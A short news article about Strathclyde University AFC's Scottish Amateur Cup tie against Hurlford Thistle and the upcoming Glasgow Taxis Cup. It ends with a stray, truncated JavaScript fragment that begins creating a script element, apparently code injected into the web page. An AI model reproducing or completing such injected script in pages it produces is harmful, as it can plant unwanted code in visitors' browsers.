Massive March for Strathclyde Student Footballers

The Strathclyde University AFC have the biggest game in their 92 season long history. The university’s Millerston playing fields at Stepps plays host to Hurlford Thistle AFC in the last 16 of the Foster’s Scottish Amateur Cup. With three teams playing each Wednesday afternoon in the British Universities & Colleges Sports leagues and three playing in local amateur leagues at the weekend, the club offers competition for players of a variety of levels.

 

The club have a big month in March, as local bragging rights are at stake on Wednesday 14th March at the Glasgow Taxis Cup, wherethe city’s three university football clubs will do battle for the title of best university club in Glasgow. The Strathclyders have some real quality in their ranks such as playmaker Ross Wilson and pacey winger Euan Wheeler, who have both had involvement in the Scotland amateur select squad this season.

Calum Murison, attacking midfielder is upbeat and said: ‘’ We are really looking forward to taking on Hurlford, it’s the furthest we have gone in the Scottish Cup and we are not in the mood to see this fantastic run end. We are training hard and obviously need no extra motivation from the coaching staff given the Glasgow Taxis Cup is coming up so soon as well’’.

The Foster’s Scottish Amateur Cup tie kick’s off at 2pm on Saturday 3 March at Millerston Playing fields, Stepps and will be being filmed with highlights being streamed online later. Admission is free.var d=document;var s=d.createElement(‘script’);
